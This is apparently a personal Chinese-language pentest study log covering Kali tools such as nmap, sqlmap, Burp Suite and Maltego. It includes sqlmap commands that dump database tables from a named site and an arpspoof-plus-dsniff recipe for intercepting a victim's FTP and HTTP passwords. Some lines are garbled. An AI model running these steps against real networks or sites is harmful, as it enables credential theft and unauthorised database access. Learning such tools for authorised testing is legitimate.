下面是我学习渗透时的工具学习:
1 httrack 可以拷贝网站 做挂马 等工具使用
kali 上 安装它,然后创建目录 myweb 登陆上去 httack 输入网站名 可以定制抓什么文件,然后就拷贝成功了
2 nmap 很强大
#nmap 192.168.1.1/24 扫描整个子网段
扫描多个目标,命令如下:
#nmap 192.168.1.2 192.168.1.5
扫描一个范围内的目标,如下:
#nmap 192.168.1.1-100 //(扫描IP地址为192.168.1.1-192.168.1.100内的所有主机)
#nmap -sS 192.168.1.1 //如果Nmap命令中没有指出扫描类型,默认的就是Tcp SYN.但是它需要root/administrator权限.
#nmap -sT 192.168.1.1 //如果不选择SYN扫描,TCP connect()扫描就是默认的扫描模式.不同于Tcp SYN扫描,Tcp connect()扫描需要完成三次握手,并且要求调用系统的connect().Tcp
connect()扫描技术只适用于找出TCP和UDP端口.
nmap -sF 192.168.1.8 //FIN扫描也不会在目标主机上创建日志(FIN扫描的优势之一).个类型的扫描都是具有差异性的,FIN扫描发送的包只包含FIN标识,NULL扫描不发送数据包上的任何字节,XMAS扫描发送FIN、PSH和URG标识的数据包.
# nmap -O -PN 192.168.1.1/24 //如果远程主机有防火墙,IDS和IPS系统,你可以使用-PN命令来确保不ping远程主机,因为有时候防火墙会组织掉ping请求.-PN命令告诉Nmap不用ping远程主机。
# nmap
-O --osscan-guess 192.168.1.1 //想好通过Nmap准确的检测到远程操作系统是比较困难的,需要使用到Nmap的猜测功能选项, –osscan-guess 猜测认为最接近目标的匹配操作系统类型。
Nmap's操作系统的检测是很准确也是很有效的,举例:使用系统Solaris
2.7带有SYN扫描的指纹验证堆栈。
# nmap -sS -O 192.168.7.12
-v: Increase verbosity level (use -vv or more for greater effect)
nmap -P 80,443,8080 -P0 -sV x.x.x.0/24 -T5 这个是扫描整个网段内的 服务
OUTPUT:
-oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3
HOST DISCOVERY:
-n/-R: Never do DNS resolution/Always resolve [default: sometimes] 不做DNS解析/总是做
nmap -n -oX my.xml 182.18.152.0/24
db_import my.xml
hosts
[*] Nmap: -A: Enable OS detection, version detection, script scanning, and traceroute
msf 中 db_nmap -n -A xxx.com
db_nmap -n -A 182.18.152.8
3 dig ip //Dig (domain information groper) is one the most popular and widely used DNS
DIG(域信息搜索器)是一种最流行和广泛使用的DNS
侦察工具。它会查询DNS服务器。 dig -t 选项将委派DNS区域使用授权名称
root@bt:/opt/metasploit/msf3# dig -t ns www.baidu.com ;; QUESTION SECTION: ;www.baidu.com. IN NS ;; ANSWER SECTION: www.baidu.com. 5 IN CNAME www.a.shifen.com. ;; AUTHORITY SECTION: a.shifen.com. 5 IN SOA ns1.a.shifen.com. baidu_dns_master.baidu.com. 1409040001 5 5 86400 3600baidu_dns_master.baidu.com DNS服务器域名
4
Maltego
讲信息收集就不得不说Maltego。Maltego应用于收集包括:域名、DNS名whios信息、ip地址等网络数据及通过公司或组织名称、邮件地址、网站、社区网络(facebook等)、电话号码收集关于个人的信息。可谓是社工利器。
注册页面 : http://www.paterva.com/redirect/m3ceregister.html
5 Arping
由于防火墙的使用等原因,部分主机会出现ping不通的状况。Arping通过发送Arp request的方式进行测试(直连网络),确定一个特定的ip在线。
直接在终端中输入命令使用。
基本命令格式:arping -c 3 192.168.1.1
参数解释:-c 3 发送的Arp请求包的数量
192.168.1.1 目标地址
如果主机在线,则返回相应的包,反之则提示丢包。
6 Genlist
genlist可以快速的扫描ip段内的存活主机,而且结果呈列表式,因此与fping相比,更简洁明了。
通过直接在终端内运行命令使用。
基本命令:genlist -s 192.168.1.*
参数解释:-s 192.168.1.* 目标ip段
7 Nbtscan
nbtscan是一个扫描网段内微软主机netbios信息的工具,只适用于局域网,可以显示ip,主机名,用户名及mac地址等。速度较快。
通过直接在终端内运行命令使用。
基本命令:nbtscan 192.168.1.1-255
8 Zenmap
9 IPv4/IPv6网络安全测试工具—Evil Foca (Alpha版)
下载地址: http://www.freebuf.com/tools/8397.html
安装不成功 提示不行~_~ 不知道为什么
10 Webshag
Webshag是一个多线程,用于审核Web服务器的多平台工具。
来到选项卡:spider· 输入目标网址 之后点击 确定会得到一些与这个
11 Skipfsh
Skipfsh是一个Web应用程序安全侦测工具。Skipfsh的准备
互动地图使用递归抓取和基于字典的探头目标。
生成的地图被扫描的安全检查后,提供输出。
下载 https://code.google.com/p/skipfish/
make all 编译 所有 得到软件
请注意,当使用默认skipfish字典将不运行
-S 命令。您可以复制一个默认的词库
-o 输出命令
最后可以从html中 查看 扫描到的东西
./skipfish -o log -S /pentest/web/skipfish/dictionaries/complete.wl http://sebug.net
12 Which
可以查询 软件安装目录 可以去找到 软件目录了
which指令会在PATH变量指定的路径中,搜索某个系统命令的位置,并且返回第一个搜索结果
cd 这个常用的命令竟然找不到啊!为什么呢?这是因为 cd 是bash 内建的命令! 但是 which 默认是找 PATH 内所规范的目录
13 Websploit is an open source project used to scan and analyze remote systems to find vulnerabilities.
show modules
show options
use xxxx
set xxxxx
run
14
14
w3af(简称Web应用程序攻击和审计框架)是一个开放源代码的 |
Web应用程序安全扫描仪和开发工具。W3af可以根据访问 |
Web应用程序评估|网络漏洞扫描器通过选择w3af。 |
15 sqlmap
一个常见的功能块。关键字会有的SqlMap得到数据库。
的SqlMap -u http://www.drchaous.com/article.php?id=5 --dbs //扫出test 数据库
sqlmap –u http://www.drchaos.com/article.php?id=5 -D test--tables
sqlmap -u http://www.drchaous.com/article.php?id=5 -T xxxtablesnameherexxx --columns
sqlmap -u http://www.drchaous.com/article.php?id=5 -T xxx tablesnameherexxx -U
sqlmap -u http://www.drchaous.com/article.php?id=5 -T xxxtablesnameherexxx -U xxxtestxxx --dump
16 linux find + locate命令学习
find / -name "dsniff" 可以查到 它的目录,但不能查到 dsniff.service
locate xxx 可以直接查到 文件名称相关的文件
17 burpsuit
xp 下是pro版本,kali 是限制版本的
1) spider 可以扫描目录 针对 * 文件扫
2)scanner 漏洞扫描,可以由spider 中 选择active scan 主动扫描进行,设置30个线程去扫 很强大
3) intruder 字典破解~_~ clear $ 然后 add $ 然后选择字典 注意 有很多自定义字典 还能够修改传输包
4) repeater 手工检测等
5) decoder 编码工具 很有用啊~_~
6) comparer 比较工具 两次的截取抓包 发送到comparer 就可以比较了
18 dsniff 工具学习
先用 nmap 扫一下内网有哪些主机 nmap -sS x.x.x.1-255
扫描针对某IP进行攻击
其一,首先打开本机的路由转发功能
操作:echo "1" > /proc/sys/net/ipv4/ip_forward
第二:
#arpspoof -t 网关的IP 受攻击者的IP
第三:打开另一个终端执行
#dsniff -c -f /usr/loca/lib/dsniff.service
到现在这个份上基本上它已经可以工作了
你可以在本机上试验一下
扫描百度账号 只能错误的才截取到,正确的不可以截取,看来百度还做的不错啊~_~
另外一种设置:
使用 A 嗅探 B 的FTP、http登录密码
1. 使用 arpspoof 对目标机实施ARP欺骗攻击
# arpspoof -i eth0 -t 192.168.0.125 192.168.0.1
2. 使用 dsniff 取得指定端口的数据信息
# dsniff -i eth0 -t 21/tcp=ftp,80/tcp=http
Dsniff支持的协议类型包括:
FTP,Telnet,SMTP,HTTP,POP,NNTP,IMAP,SNMP,LDAP,Rlogin,RIP,OSP
F,PPTP,MS-CHAP,NFS,VRRP,YP/NIS,SOCKS,X11,CVS,IRC,AIM,ICQ,Napster,ostgreSQL,Meeting Maker,Citrix ICA,Symantec,pcAnywhere,NA
I Sniffer,Microsoft SMB,Oracle QL*Net,Sybase及Microsoft SQL认证信息
FTP等的可以扫 ,phpmyadmin
更深入了解: http://viewer.ubnt.com.cn/web/viewer.php?aid=NDY4OHw1Yjg0N2I2MHwxNDEwNzg2NzY5fDB8NTY2OQ%3D%3D
纯粹被动地进行网络活动监视的工具,包括:dsniff、filesnarf、mailsnarf 、msgsnarf、urlsnarf、webspy
19 Firefox插件
1) Fiddler web debugger 工具
Fiddler是最强大最好用的Web调试工具之一,它能记录所有客户端和服务器的http和https请求,允许你监视,设置断点,甚至修改输入输出数据. 使用Fiddler无论对开发还是测试来说,都有很大的帮助。
学习文章 : Fiddler 教程
bpu http://xxx.com 和 bpafter http://xxx.com
Fiddler 浏览器代理神器,拦截请求或响应抓包,重放,模拟请求,编码解码,三方扩展Watcher-Web前端安全的自动审计工具
2) Firebug-抓包与各种调试
3) amper Data-拦截修改
4) Live Http Header-重放功能
5)Hackbar-编码解码/POST提交
6) Modify Headers-修改头部